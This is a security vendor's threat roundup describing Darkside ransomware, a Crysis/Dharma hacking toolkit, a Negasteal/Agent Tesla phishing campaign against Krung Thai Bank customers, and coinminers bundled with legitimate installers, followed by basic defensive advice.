Insights and analysis by Miguel Ang, Raphael Centeno, Don Ovid Ladores, Nikko Tamaña, and Llallum Victoria
In the past few weeks, we have spotted notable developments for different types of threats. For ransomware, a new family named Darkside surfaced, while operators behind Crysis/Dharma released a hacking toolkit. For messaging threats, a targeted email campaign was used to propagate Negasteal/Agent Tesla. Finally, for fileless threats, a coinminer was seen bundled with legitimate applications.
Read on to know more about these findings.
Darkside ransomware surfaced
A new ransomware family named Darkside (detected by Trend Micro as Ransom.Win32.DARKSIDE.YXAH-THA) has emerged. Operators behind this ransomware threaten to publish unpaying victims’ data, a similar tactic employed by operators of ransomware families such as Maze and Nefilim. The file extension used to append the names of encrypted files is based on the victim’s MAC address.
According to the ransomware's Tor webpage, the threat actors behind the ransomware check the potential target company’s financial capability. From there, they determine how much ransom their targets will pay. It was also indicated that the operators will not attack organizations under the medical, education, non-profit, and government sectors.
Figure 1. A Darkside ransom note
Crysis operators released a hacking tool kit
Crysis/Dharma ransomware (detected by Trend Micro as Ransom.Win32.CRYSIS.TIBGGS) has released a hacking toolkit named Toolbox, Sophos reports. Toolbox contains Mimikatz to harvest passwords, NirSoft Remote Desktop PassView to steal remote desktop protocol (RDP) passwords, Hash Suite Tools Free to dump hashes, and other tools to help find target computers and deploy the ransomware payload. With this kit, even rookie hackers can infiltrate networks easily.
Crysis operates under a ransomware-as-a-service (RaaS) model, and this hacking tool only makes it easier for affiliates to spread the ransomware to more targets.
Negasteal/Agent Tesla delivered via emails targeting bank account holders
We recently found emails that deliver Negasteal/Agent Tesla (detected by Trend Micro as TrojanSpy.MSIL.NEGASTEAL.DYSGXT) through malicious attachments. The scheme targets account holders of Krung Thai Bank. The email informs the recipient of a supposed “outward remittance transaction” worth almost US$9,000. This prompts users to download the attachment which contains a document that exploits CVE-2017-11882 (also known as Microsoft Office Memory Corruption Vulnerability), a 17-year old memory corruption issue in Microsoft Office, to download and run the malware payload.
Figure 2. Sample email with malicious attachment containing Negasteal
Legitimate applications bundled with coinminer
We also found legitimate applications such as TeamViewer, Rufus, and YTD Video Downloader bundled with a fileless coinminer (detected by Trend Micro as Coinminer.Win32.MALXMR.THHADBO). These installers do not come from official download centers or app stores. Upon download, the legitimate application and a malicious script (VBS file) are dropped into the user’s system. The malicious script then connects to a site to download the coinminer loader, which will then be used to load the coinminer.
Bundling coinminers and other malware types with legitimate installers of applications (such as video conferencing apps) is not a novel strategy; however, users who are not yet too familiar with this fact might unwittingly download from suspicious sources and inadvertently compromise their systems.
Figure 3. Coinminer bundled with TeamViewer installer
Figure 4. Obfuscated VBS file
Defense against a variety of threats
The fast-paced nature of the cybersecurity landscape means that threats emerge at every turn, creating a never-ending race between threat actors and security researchers. Enterprises and individual users should keep abreast of developments so that they can perform the necessary actions to prevent these threats from compromising their systems. As the popular adage says, “knowing is half the battle”.
To tackle a variety of threats, enterprises and users are advised to develop good security practices with the help of the following:
Only download apps from official download centers or app stores.
Never click links and download attachments from emails or any other messages that come from untrustworthy sources.
Regularly update software and applications to ensure that the latest vulnerabilities are patched.
Equip systems with security solutions that can block and defend against threats.
The following solutions can help secure against a variety of threats: